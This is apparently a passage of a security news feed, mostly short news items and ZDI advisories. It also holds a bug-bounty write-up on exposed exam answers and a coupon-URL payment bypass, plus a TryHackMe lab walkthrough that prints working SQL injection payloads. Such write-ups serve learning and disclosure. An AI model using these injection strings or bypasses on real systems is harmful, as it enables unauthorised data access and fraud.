parameter ‘credited’ containing values like: [NjR0cnVlNDk=, NzhmYWxzZTY5, MjBmYWxzZTg2, MTAwZmFsc2U0Mg== ] On decoding these values, we get [64true49, 78false69, 20false86, 100false42], exposing which options are actually true and which are false before actually answering the questions in the browser.3. BAC to payment bypass for paid coursesThis is the last vulnerability I encountered on that educational platform. There were many paid courses ranging from $199 to $999. Upon fetching the URLS of the domain, one of the URLS caught my eye. The URL was: “https://education.target.com/enroll/1413977?coupon=coupon_value". When opening the above URL could actually enrolled users in the paid course with the certification id ‘1413977’ which would cost $999 if bought. This requires no any payment method and would work on any free accounts registered. Then, I started collecting the certificate id from the store and replace the certificate id in the URL. This eventually enrolled me to some of the paid courses without any payment method applied allowing me to the full access to the resources and the final certification exam due to the coupon code in the URL.Now, recalling above vulnerabilities, second vulnerability would allow me to know the answers of any certifications exam via vulnerable API endpoint and the third vulnerability would allow me to enroll in some of the paid courses without any payment. Combining these two vulnerabilities, I was able to get enrolled in some of the paid courses and pass the exam with all answers correctly gaining me the final certifications without paying even a dollar and without knowing anything.After promptly reporting these security vulnerabilities , the security team swiftly triaged the issues and fixed them. So this was all about the findings. Thanks for reading till the end. You can also connect with me on LinkedIn & Twitter.From Uncovering to Securing: Tackling Three Vulnerabilities in Educational Domain was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

Hello, my digital adventurers. This is the first part of my Splunk series. I will share more insights about Splunk in my upcoming articles.Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

OSINT ChallengesTest your OSINT skills with this challenge, uncover hidden details through your investigative skillsBackground Image by BiZkettE1 on FreepikIn this write-up I will be going over OSINT Exercise #004 by Sofia Santos.OSINT Exercise #004TaskWe have a photo of a resort located on an island. We have 3 questions to answer: a) What is the name of the resort? b) What are the coordinates of the island? c) In which cardinal direction was the camera facing when the photo was taken?SolutionTask 1We can use a image reverse search service (Tiny Eye, Google Image) to find other articles/images that contain the photo we are given.The search result shows us that the resort in the image is called “Oan Resort”.The resort is located on Oan Island, Wonip, Micronesia.Task 2Searching for “Oan Resort” on Google Maps will bring up the listing for the resort. We can get the co-ordinate for the resort by right clicking on the pin icon on the map.Oan Resort — Google MapsThe resort is located at “7.3625207, 151.7561042”.Task 3For 3rd question we can utilize the 3D view feature provided by Google Maps. This feature can be enabled by clicking on Layers → More → Global View.We need to position the 3D view camera in such a way that it resembles the angle from which the photo was taken. Once we have the correct view we can use the campus on the map to figure could the direction of the camera.If we look closely at the image we can see that behind Oan island towards the left side some islands are present visible.The compass on Google Maps uses uses the red arrow to represent North, the grey arrow represents South. The position represented by the top of the compass shows the direction the virtual camera is facing.If we look at a compass with the cardinal directions and set it such that North is slightly towards the right we will see that we are facing North West. From this we can conclude that the camera what was used to take the image was facing “North West”.List of OSINT Exercises - Challenge Yourself!If you found this write-up to be useful consider:Liking the Post: You can like (applaud) the post up to 50 times.Leave a Comment: Your feedback and comments are invaluable. They not only support me, but also enrich the discussion for other readers.Share the Article: If you believe others would benefit from this article, please consider sharing it within your network.Follow Me: Feel free to connect with me on Medium, LinkedIn, GitHub and Discord.Explore More: All of my posts can also be accessed on Source Code.Thank you for your time. Your support motivates me to continue writing.Sofia Santos: OSINT Exercise #004 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

We are exposed to PHP web applications with backend logic in this room. 💻 I won’t go into detail since it’s a guided room; instead, I’ll…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

Security researcher discovers a non-password-protected database containing over 240,000 records belonging to US-based FinTech bill payment platform Willow…

by Hackread

Researchers found malicious npm and PyPI packages capable of stealing and deleting sensitive data from infected systems. Socket researchers have identified multiple packages in the npm and Python Package Index (PyPI) repository designed to target Solana private keys and drain funds from victims’ wallets. The malicious npm packages allowed the threat actors to exfiltrate Solana […]

by Security Affairs

Microsoft has fixed a bug that was causing some Windows Server 2022 systems with two or more NUMA nodes to fail to start up. [...]

by BleepingComputer

The FCC adopts declaratory ruling requiring telecommunications providers to secure their networks against nation-states and other threats. The post FCC Taking Action in Response to China’s Telecoms Hacking appeared first on SecurityWeek.

by SecurityWeek

Sneaky 2FA: New Phishing-as-a-Service targets Microsoft 365, leveraging sophisticated evasion techniques and a Telegram-based platform to steal credentials.…

by Hackread

CISA and the FBI have updated their guidance regarding risky software security bad practices based on feedback received from the public. The post CISA, FBI Update Software Security Recommendations  appeared first on SecurityWeek.

by SecurityWeek

Yubico has released a security advisory, YSA-2025-01, which highlighted a vulnerability within the software module that supports two-factor authentication (2FA) for Linux and macOS platforms. This issue, tracked as CVE-2025-23013, allows for a partial 2FA bypass protections when using YubiKeys or other FIDO-compatible authenticators. The vulnerability poses a high-risk security threat and could potentially compromise authentication processes for users relying on Yubico’s open-source pam-u2f software.   Yubico''s pam-u2f software package, a Pluggable Authentication Module (PAM) used to integrate YubiKey and other FIDO-compliant devices with Linux and macOS systems, contains a vulnerability that can lead to a 2FA bypass in some configurations. This flaw primarily affects systems running versions of pam-u2f prior to 1.3.1, where the authentication process does not correctly handle certain errors. In particular, when the system experiences issues such as memory allocation errors or the absence of necessary files, the pam-u2f module may fail to trigger proper authentication checks.  The 2FA Bypass Vulnerability  The 2FA bypass vulnerability arises in the pam_sm_authenticate() function, which is responsible for managing the authentication flow. When certain conditions occur—such as failure to allocate memory or privilege escalation issues—the function returns a response of PAM_IGNORE. This prevents the system from completing the authentication process correctly, bypassing 2FA in scenarios where it should be validated.  Additionally, if the nouserok option is enabled in the configuration, pam-u2f may return PAM_SUCCESS even when the authfile is missing or corrupted. This presents a critical risk, particularly in configurations where 2FA is set up as the primary or secondary authentication factor.  What Does This Mean for Users?  The vulnerability primarily affects users who have installed pam-u2f on Linux or macOS systems via methods like apt or manual installation. Specifically, users with versions of pam-u2f prior to 1.3.1 are vulnerable to this issue, which may lead to unauthorized access if the system’s 2FA protections are bypassed. However, no hardware used for 2FA, including any YubiKey devices, is affected by this vulnerability. The issue lies entirely within the software configuration, not the hardware security keys.  Yubico has recommended that all affected customers upgrade to the latest version of pam-u2f immediately to mitigate the vulnerability. Users can download the latest release directly from Yubico’s GitHub repository or update via Yubico’s Personal Package Archive (PPA).  How Are Different Configurations Impacted?  The severity of the vulnerability varies depending on the system configuration. For instance:  Single Factor Authentication with User-Managed Authfile: In this scenario, where pam-u2f is used as a single factor and the authfile is located in the user''s home directory, an attacker could remove or corrupt the authfile. This would cause pam-u2f to return PAM_SUCCESS, allowing unauthorized access and potentially escalating privileges if the user has sudo access. This scenario has been assigned a CVSS score of 7.3, indicating a high severity.  Two-Factor Authentication with Centrally Managed Authfile: If pam-u2f is used alongside a user’s password for two-factor authentication, the vulnerability may be triggered by a memory allocation error or a lack of necessary files. In this case, the second authentication factor may fail to verify, leaving the system open to attacks. This scenario carries a CVSS score of 7.1.  Use of pam-u2f as a Single Authentication Factor with Other PAM Modules: When pam-u2f is used in conjunction with other PAM modules that do not perform authentication, forcing a PAM_IGNORE response would prevent any authentication from occurring. If the user has administrative privileges, this could lead to local privilege escalation. This scenario also carries a CVSS score of 7.3.  Conclusion   Yubico urges affected customers to immediately upgrade to the latest version of pam-u2f to protect against the 2FA bypass vulnerability, with alternative mitigation measures available for those unable to update right away. This advisory highlights the crucial role of two-factor authentication (2FA) in securing systems, while also showing that vulnerabilities within 2FA solutions can still pose risks.  

by The Cyber Express

HPE is investigating claims by the hacker IntelBroker, who is offering to sell source code and other data allegedly stolen from the tech giant. The post HPE Investigating Breach Claims After Hacker Offers to Sell Data appeared first on SecurityWeek.

by SecurityWeek

Cybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repository that come with capabilities to steal data and even delete sensitive data from infected systems. The list of identified packages is below - @async-mutex/mutex, a typosquat of async-mute (npm) dexscreener, which masquerades as a library for accessing liquidity pool

by The Hacker News

As automation and AI reshape IT support, local providers continue to shine by offering personalized service, rapid on-site assistance, and creative problem-solving for complex issues.

by ITPro Today

TikTok restored service to users in the United States on Sunday just hours after the popular video-sharing platform went dark in response to a federal ban. The post TikTok Restores Service for US Users Based on Trump’s Promised Executive Order appeared first on SecurityWeek.

by SecurityWeek

Organizations are increasingly reconsidering where they put their money and workloads in the cloud as AI becomes a new driver.

by ITPro Today

With the Budget 2025 soon to be announced, India stands at a pivotal moment in its digital transformation journey, increasingly relying on digital platforms and technologies for business, governance, and daily life. As the nation''s digital ecosystem experiences exponential growth, driven by a surge in mobile applications, the need to enhance its cybersecurity infrastructure has never been more urgent. Sharing his perspective on this vital issue, Manish Mimani, Founder and CEO of Protectt.ai, emphasizes that the Union Budget 2025 offers a pivotal opportunity to strengthen India’s digital & cybersecurity framework. Mimani highlights the need for focused financial reforms, strategic investments, and innovative policies to bolster India’s defenses against growing cyber risks, while fostering a culture of resilience and innovation in the cybersecurity ecosystem. The following key recommendations by Mimani outline how Budget 2025 can play a transformative role in securing India’s digital future: Budget 2025: What to Except for Cybersecurity Establishing a Cybersecurity Research & Development (R&D) in Multiple city The government could allocate funds to establish a dedicated R&D institute focused on cybersecurity. This hub would foster innovation and develop advanced security solutions tailored to India’s unique needs. By nurturing homegrown technologies, India can reduce reliance on foreign solutions and position itself as a global leader in cybersecurity innovation. Financial Incentives for Cybersecurity Startups Targeted financial incentives, such as tax holidays, grants, and subsidized loans, could stimulate the growth of startups specializing in cybersecurity. Encouraging innovation in this sector would not only strengthen India’s defenses but also allow the nation to capture a larger share of the growing global cybersecurity market. Upskilling and Talent Development Bridging the cybersecurity skills gap is essential for safeguarding India’s digital future. The budget could fund comprehensive training and upskilling programs, including partnerships with educational institutions to develop specialized curricula. Subsidized training for IT professionals and initiatives to attract talent to cybersecurity careers would help ensure a robust pipeline of skilled professionals. Public-Private Partnerships for Cybersecurity Infrastructure Allocating budgetary support for public-private partnerships (PPPs) could accelerate the development of shared cybersecurity resources. Collaborative initiatives between the government and private sector would create platforms for threat intelligence sharing, infrastructure development, and advanced research, bolstering India’s ability to counter emerging cyber threats. Reduction in GST on 100% Made in India Cybersecurity Products Reducing the Goods and Services Tax (GST) on cybersecurity software and tools could make essential safeguards more affordable for businesses, especially small and medium enterprises (SMEs). Currently taxed at 18%, lowering this rate would enable wider adoption of advanced security solutions, enhancing the resilience of India’s digital infrastructure. Lower Import Duties on Critical Hardware High import duties on servers, GPUs, and other essential components inflate the cost of building robust cybersecurity systems. By reducing these duties, the government could make cutting-edge technology more accessible to businesses, enabling real-time threat detection and efficient anomaly analysis across sectors. Tax Benefits for Cybersecurity Investments Introducing tax incentives for businesses that implement strong cybersecurity measures could encourage proactive adoption of best practices. Deductions for investments in cybersecurity audits, penetration testing, and advanced security systems would foster a more secure digital ecosystem. Conclusion The Union Budget 2025 represents a significant opportunity to bolster India’s cybersecurity capabilities. By adopting strategic measures such as tax incentives, reduced GST rates, and investments in R&D and talent development, the government can create a more resilient and secure digital environment. As businesses and citizens increasingly depend on digital platforms, mobile app security emerges as a critical focus area within the broader cybersecurity landscape. By directing resources and attention to this domain, India can ensure the safety of its digital economy, foster innovation, and maintain its appeal as a global hub for technology and investment.

by The Cyber Express

Cloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.

by Darktrace

Attackers are impersonating the Computer Emergency Response Team of Ukraine (CERT-UA) via AnyDesk to gain access to target computers. The request (Source: CERT-UA) “Unidentified individuals are sending connection requests via AnyDesk under the pretext of conducting a ‘security audit to verify the level of protection,’ using the name ‘CERT.UA,’ the CERT-UA logo, and the AnyDesk ID “1518341498” (which may vary),” CERT-UA explained on Friday. The requests are apparently unarranged and the attackers are counting on … More → The post CERT-UA warns against “security audit” requests via AnyDesk appeared first on Help Net Security.

by Help Net Security

The U.S. Department of the Treasury''s Office of Foreign Assets Control (OFAC) issued sanctions against two entities linked to major cyber activities targeting U.S. national security. The sanctions target Yin Kecheng, a Shanghai-based cyber actor involved in a recent compromise of Treasury Department networks, and Sichuan Juxinhe Network Technology Co., LTD., a cybersecurity company connected to the notorious Salt Typhoon hacker group. These sanctions are part of the U.S. government''s ongoing efforts to combat the growing threat posed by cyber actors associated with the People’s Republic of China (PRC).  Yin Kecheng is identified as a key figure behind the breach of the Department of the Treasury’s Departmental Offices network. This incident is part of a broader trend of PRC-based malicious cyber activity aimed at infiltrating U.S. government systems. According to OFAC, Yin has been active in cyber espionage for over a decade and is linked to China’s Ministry of State Security (MSS). The Treasury Department''s sanctions against Yin Kecheng are based on Executive Order (E.O.) 13694, which targets individuals and entities involved in cybercrimes that pose cyber risks to U.S. national security, foreign policy, or economic interests.  Adewale O. Adeyemo, the Deputy Secretary of the Treasury, emphasized the department''s commitment to holding cyber actors accountable. The Treasury Department will continue to use its authorities to hold accountable malicious cyber actors who target the American people, our companies, and the United States government, including those who have targeted the Treasury Department specifically,"" said Adeyemo.  Salt Typhoon and the Increasing Threat of Cyber Intrusions  The sanctions also extend to Sichuan Juxinhe Network Technology Co., LTD., a Chinese cybersecurity firm directly involved in the cyber activities of the Salt Typhoon group. Active since at least 2019, Salt Typhoon has been responsible for significant breaches within U.S. telecommunication and internet service provider networks. Most recently, the group compromised the infrastructure of several major companies within these sectors, further escalating concerns over Chinese cyber operations against critical U.S. infrastructure.  Salt Typhoon''s operations are not isolated. They represent a growing number of cyber activities attributed to PRC-linked actors. These incidents necessitate costly remediation efforts for impacted organizations and threaten the stability of critical national infrastructure. Sichuan Juxinhe is known for its direct involvement in exploiting vulnerabilities in U.S. networks and has maintained strong ties with Chinese state-sponsored entities. According to OFAC, these actions are consistent with the broader strategy of Chinese state-backed cyber groups targeting critical U.S. infrastructure.  Treasury Department''s Ongoing Efforts to Counter Cyber Threats  The sanctions against Yin Kecheng and Sichuan Juxinhe are part of a series of measures aimed at curbing increasingly reckless cyber activities tied to China. On January 3, 2025, OFAC sanctioned Integrity Technology Group, Inc. for its role in Flax Typhoon’s malicious activities. Previous actions in 2024 also saw the designation of entities like Sichuan Silence Information Technology Company, Ltd., responsible for compromising U.S. firewalls, and Wuhan Xiaoruizhi Science and Technology Company, Ltd., linked to the Advanced Persistent Threat (APT) 31 group.  These sanctions are a crucial part of the U.S. government''s strategy to protect its cyber infrastructure and prevent further compromises by malicious actors. The Office of the Director of National Intelligence’s Annual Threat Assessment further highlighted that Chinese cyber actors, including those linked to the MSS, remain some of the most persistent threats to U.S. national security.  Conclusion   To strengthen its efforts against cyber threats, the U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of individuals involved in malicious cyber activities targeting U.S. critical infrastructure, with the Rewards for Justice program encouraging people to come forward with such information.  In parallel, the U.S. Treasury’s sanctions against Yin Kecheng and Sichuan Juxinhe, and their ties to the Salt Typhoon hacker group, ensure that any property or interests tied to these entities in the U.S. are blocked, with strict penalties for violations of these sanctions. The Treasury Department''s enforcement of these measures sends a strong message about the seriousness of cybersecurity and highlights the U.S. government''s commitment to combating foreign cyber threats, reinforcing the need for international cooperation in addressing these growing challenges to national security. 

by The Cyber Express

Elon Musk, the renowned CEO of Tesla and SpaceX, has made waves with a bold statement regarding the cybersecurity vulnerabilities within the U.S. government. Musk took to social media platform X (formerly Twitter), responding to a report on a Chinese cyberattack that breached U.S. Treasury systems. Musk’s comment was clear: he could “fix” the government’s Information Technology (IT) department, adding that the task would be “harder than getting a rocket to orbit.” This candid reply came in response to a tweet by Mario Nawfal, Founder of IBC Group, who shared the news that Chinese state-sponsored hackers had infiltrated the U.S. Treasury Department, compromising systems that included devices belonging to key officials such as Treasury Secretary Janet Yellen and her deputies. Musk, whose ventures have disrupted industries across the globe, wasn’t shy about his willingness to take on the monumental task of improving the government’s IT systems. In a world increasingly under the threat of cyberattacks, Musk’s words have sparked curiosity, debate, and a sense of urgency among those invested in cybersecurity. Musk’s response, “My goal is to fix government IT! This is harder than getting a rocket to orbit. Actually,” immediately caught the attention of many. Known for his ambitious goals, Musk is no stranger to challenges. Whether it’s revolutionizing electric cars with Tesla, sending humans to Mars with SpaceX, or advancing renewable energy solutions, Musk has built a reputation for pushing the boundaries of what’s possible. So, when he speaks about tackling the cybersecurity woes of the U.S. government, people take note. [caption id=""attachment_100323"" align=""aligncenter"" width=""285""] Source: X[/caption] U.S. Government Grapples with Increasing Cyber Threats Musk’s comments come at a time when the U.S. government is facing an escalating wave of cyberattacks that have compromised sensitive data and disrupted vital services. The most recent breach was a cyberattack on the U.S. Treasury Department in December 2024, in which Chinese hackers exploited a vulnerability in a third-party cybersecurity provider, BeyondTrust. This breach, attributed to a Chinese Advanced Persistent Threat (APT) group, resulted in unauthorized access to unclassified government documents. The breach has been seen as one of the most significant cyber incidents in recent U.S. history, raising serious concerns about the security of critical government systems. The Treasury Department attack was just the tip of the iceberg. Shortly after the Treasury breach, major telecommunications companies, including AT&T and Verizon, fell victim to a massive cyberattack attributed to China. Dubbed “Salt Typhoon,” this hack is believed to be one of the largest intelligence compromises the U.S. has ever faced. Moreover, the U.S. Department of Defense experienced its own security breach in November 2024, in which hackers gained access to sensitive military information. These attacks demonstrate the vulnerability of both government and private-sector systems to increasingly sophisticated adversaries. Musk’s willingness to help address these vulnerabilities is timely and could play a crucial role in strengthening the country’s defenses. The rise in cyberattacks, particularly from state-sponsored hackers like China and Russia, highlights the need for more strong cybersecurity measures across all sectors, particularly government infrastructure. Elon Musk’s Unique Offer: A New Approach to Government IT Security? Elon Musk is undoubtedly an influential figure in the tech world, known for pushing the envelope and taking on challenges that others deem impossible. His ventures, which include revolutionizing electric vehicles, space exploration, and even pursuing neural technology with projects like Neuralink, have made him one of the most recognized names in technology. Yet, Musk’s approach to business and innovation is often unconventional, which has earned him both admirers and critics. His offer to assist in fixing the U.S. government’s IT systems comes at a time when the need for stronger cybersecurity has never been more apparent. The country is facing an increasing number of cyberattacks, many of which are backed by foreign state actors. These breaches pose a direct threat to national security, compromising everything from sensitive government communications to critical infrastructure. Musk’s expertise in tech and innovation gives him a unique perspective on how to tackle these challenges. His experience with SpaceX, where precision and reliability are paramount, and Tesla, where software and data play key roles in autonomous driving, gives him a deep understanding of the cybersecurity requirements needed to protect complex systems. Musk is known for taking bold, decisive actions to solve problems, often applying unconventional methods. While his offer to help may seem audacious, it also highlights a critical truth: traditional methods of cybersecurity may no longer be sufficient to counter modern, state-sponsored cyberattacks. To Sum Up As Musk pointed out, fixing government IT systems is no small feat. The complexity of government infrastructure, combined with the growing cyberattacks, makes it a daunting challenge. Yet, Musk’s confidence in tackling this issue is a reminder of the urgency with which the U.S. government must address its cybersecurity vulnerabilities. With hackers targeting critical sectors like defense, telecommunications, and finance, it’s clear that a new approach is needed. As the U.S. faces an increasingly hostile cyber threat landscape, the question remains: can Elon Musk’s vision and innovative thinking be the solution to strengthening the country’s cybersecurity infrastructure? Only time will tell, but his offer to help fix the nation’s IT systems highlights the critical need for action in the face of rising cyber threats. The conversation around Musk’s potential role in improving U.S. cybersecurity is just beginning, but it’s clear that the stakes couldn’t be higher.

by The Cyber Express

Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!

by Malwarebytes Labs

Anne Neuberger, the Deputy National Security Advisor, Cyber & Emerging Tech at National Security Council, The White House, resigned from her position on January 17, 2025. Her resignation sparked an interesting debate over the ongoing cybersecurity landscape in the US.   Neuberger’s departure comes at a time when cyber threats, particularly from China, have reached new levels of cybercrime. Under her guidance, the Biden administration made substantial strides in addressing these cyber threats. The primary concerns revolved around China-backed cyberattacks on U.S. infrastructure, including power grids, communication systems, and other vital sectors.   Anne Neuberger Resigns from National Security Council  One of Neuberger’s major accomplishments was overseeing the launch of the US Cyber Trust Mark program. This initiative aimed to improve security standards for consumer products, helping consumers identify safer products in the marketplace. The program represented a key pillar of the administration’s cybersecurity strategy, which also included two pivotal executive orders on cybersecurity that set the groundwork for future policy development.  In line with Neuberger’s work, outgoing President Joe Biden issued an ambitious cybersecurity order on January 18, 2025, aimed at strengthening U.S. government cybersecurity. This executive order, which builds upon plans initiated after the 2021 Colonial Pipeline ransomware attack, includes directives to enhance software and cloud security. These measures are part of the administration’s efforts to protect the country from ongoing cyber threats, particularly those emanating from adversaries like China and Russia.  Biden’s cybersecurity order emphasizes the need for software providers and cloud companies to implement secure development practices. Agencies like the National Institute of Standards and Technology (NIST), the Cybersecurity and Infrastructure Security Agency (CISA), and the Office of Management and Budget (OMB) will play crucial roles in enforcing these new standards. The executive order also directs the development of new policies for open-source software, requiring security assessments and patching procedures to protect federal systems.  The Impact of Chinese Threat Actors  Robert Huber, the Chief Security Officer and Head of Research at Tenable Public Sector, commented on the urgency of these measures. He referenced recent attacks, such as the Salt Typhoon and Treasury Department breaches, as stark reminders of the vulnerabilities in current cybersecurity systems.   Huber noted that these incidents had not only compromised public trust but also created opportunities for adversaries like China to disrupt critical services and national defense. He praised the Biden administration’s executive order for addressing long-overdue updates in the nation’s cybersecurity infrastructure, especially in regard to third-party software supply chains.  As Neuberger departs, the Biden administration''s focus on cybersecurity continues to adapt to new changes. The president’s executive order is expected to have a large impact, particularly in ensuring that federal contractors adhere to better cybersecurity practices. The goal is to create a more secure digital environment for federal systems and communications, reducing the risk of future cyberattacks that could undermine national security.  The Biden administration’s final cybersecurity efforts also include measures to protect against threats from climate change. CISA officials, including Jen Easterly and David Mussington, have highlighted the importance of enhancing critical infrastructure resilience in light of environmental challenges. This broader approach reflects the growing recognition of cybersecurity as a cross-cutting issue that intersects with national defense, public health, and environmental concerns. 

by The Cyber Express

Microsoft has shared a temporary fix for a known issue that causes classic Outlook to crash when writing, replying to, or forwarding an email. [...]

by BleepingComputer

The twin cryptocurrency and digital identity revolutions are supposed to be building a better future, where anybody can take charge of their sovereignty and security in a world where both face unprecedented threats. Yet at one crucial level, the decentralization ecosystem has a glaring vulnerability: consumer hardware wallets. Devices like Ledger sell themselves as the last word in security for the crypto economy. Most end users will accept those marketing messages, hook, line, and sinker. … More → The post Decentralization is happening everywhere, so why are crypto wallets “walled gardens”? appeared first on Help Net Security.

by Help Net Security

In this Help Net Security interview, Arunava Bag, CTO at Digitate, discusses how organizations can recover digital operations after an incident, prioritize cybersecurity strategies, and secure digital operations with effective frameworks. What measures should organizations take to recover digital operations after an incident? IT security teams everywhere are struggling to meet the scale of actions required to ensure IT operational risk remediation from continually evolving threats. Recovering digital operations after an incident requires a proactive … More → The post AI-driven insights transform security preparedness and recovery appeared first on Help Net Security.

by Help Net Security

by SC Media

Attacks happen frequently on the security stack or within an enterprise. Often, they’re carried out by some unknown entity on the other side of the globe. You don’t know who you’re dealing with. You don’t know who they are. In this Help Net Security video, Jerry Mancini, NETSCOUT’s Senior Director, Office of the Enterprise CTO, discusses NDR’s role in a modern cybersecurity stack. The post NDR’s role in a modern cybersecurity stack appeared first on Help Net Security.

by Help Net Security

Despite their potential, many organizations hesitate to fully adopt GenAI tools due to concerns about sensitive data being inadvertently shared and possibly used to train these systems, according to Harmonic. Sensitive data exposure in GenAI prompts A new study, based on tens of thousands of prompts from business users, reveals that nearly one in ten potentially disclose sensitive data. The prompts have been analyzed by Harmonic Security during Q4 of 2024 and monitor the use … More → The post One in ten GenAI prompts puts sensitive data at risk appeared first on Help Net Security.

by Help Net Security

Critical flaws in WGS-804HPT switches could be chained to gain remote code execution on Planet Technology’s industrial devices. The Planet WGS-804HPT industrial switch is used in building and home automation networks to provide connectivity of Internet of things (IoT) devices, IP surveillance cameras, and wireless LAN network applications. This switch family is equipped with a […]

by Security Affairs

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2025-0574.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-0572.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create arbitrary files on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-0573.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0569.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0571.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.5. The following CVEs are assigned: CVE-2025-0570.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Sante PACS Server. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.5. The following CVEs are assigned: CVE-2025-0568.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple WebKit. User interaction is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-27856.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8811.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to escalate privileges on affected installations of Adobe Photoshop. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.3. The following CVEs are assigned: CVE-2025-21127.

by Zero Day Initiative Advisories

Hacker IntelBroker claims to have breached Hewlett Packard Enterprise (HPE), exposing sensitive data like source code, certificates, and…

by Hackread

Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape. Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection Ransomware on ESXi: The mechanization of virtualized attacks FunkSec – Alleged Top Ransomware Group Powered by AI Abusing AWS Native Services: Ransomware Encrypting S3 Buckets […]

by Security Affairs

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. U.S. Treasury Sanctions Chinese cybersecurity firm and actor over federal agency breach tied to Salt Typhoon EU privacy […]

by Security Affairs

A WordPress W3 Total Cache plugin vulnerability could allow attackers to access information from internal services, including metadata on cloud-based apps. A severe vulnerability, tracked as CVE-2024-12365 (CVSS score of 8.5) in the WordPress W3 Total Cache plugin could expose metadata from internal services and cloud apps. The WordPress W3 Total Cache plugin is a […]

by Security Affairs

by SC Media

TryHackMe Light WalkthroughWelcome to the Light database application!Mode:EASYI am working on a database application called Light! Would you like to try it out?If so, the application is running on port 1337. You can connect to it using nc 10.10.235.64 1337You can use the username smokey in order to get started.Room Link: Light THMEverything seemed fine until the morning after I completed yesterday’s TryHackMe rooms and went to sleep. As the sun rose, I stumbled upon a partially completed writeup by my friend on the “Room Light” challenge on TryHackMe. Intrigued and motivated, I decided to take it on myself.Setting my aim on capturing the flag, I fired up the machine and began my journey. But this wasn’t an easy challenge — it required precision, the right commands, and a well-constructed syntax to get anywhere.Initial DiscoveryThe only thing that worked perfectly was a hint:nc 10.10.235.64 1337Using the user smokey as username :gave a password:vYQ5ngPpw8AdUmLThis clue set the stage for further enumeration.Enumeration PhaseRunning an Nmap scan revealed two open ports:22 (SSH)1337At this point, I expected a standard workflow — gather data from port 1337, log in via SSH, and perform privilege escalation. However, this machine had its own twists and challenges, deviating from the typical path I anticipated.Working through various commands and encountering errors eventually led me to discover two columns after some trial and error. The columns contained only username and password—nothing else.Using the command:smokey'' OR ''a''=''arevealed a password:tF8tj2o94WE4LKCHowever, I wasn’t sure who the password belonged to, so I continued experimenting to find a favorable command.The real progress began here. After more testing, I discovered a working command:smokey'' UNION SELECT name FROM sqlite_master WHERE type=''tableThis revealed a table name. Next, I identified the columns, which were crucial for further progress.Next, we needed to retrieve the admin username. This was straightforward using the following command:smokey'' UNION SELECT username FROM admintable WHERE username LIKE ''%''The next task was to obtain the admin password. For this, the following command was used:smokey'' UNION SELECT password FROM admintable WHERE username = ''{adminusername}''Next, I assumed the discovered credentials would allow SSH login, but that turned out to be incorrect. To dig deeper, I checked for other entries in the username column. It revealed there were only two entries. This was done using the command:smokey'' UNION SELECT COUNT(username) FROM admintable WHERE ''1A quick realization struck me: since we already knew one username, applying a condition to exclude that name (!=) would retrieve the password of the other user. Since there was only one remaining entry, I was confident it would lead to the flag. With a simple correction to the previous commands, the flag was revealed:smokey'' UNION SELECT password FROM admintable WHERE username != ''{adminusername}''Eureka! The room has been solved, and the flag has been captured. While the overall experience was enjoyable, hunting for the correct commands was quite frustrating until I finally found the right approach.The restrictions and setups made gaining entry to the room slightly challenging.In the end, this room taught me the value of methodical exploration and the importance of testing different angles when facing unexpected obstacles. It was a rewarding experience that reinforced key concepts in web application security.good luck with your next challenge! Feel free to reach out whenever you need help. See you next time! 👋THM light walkthrough was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups

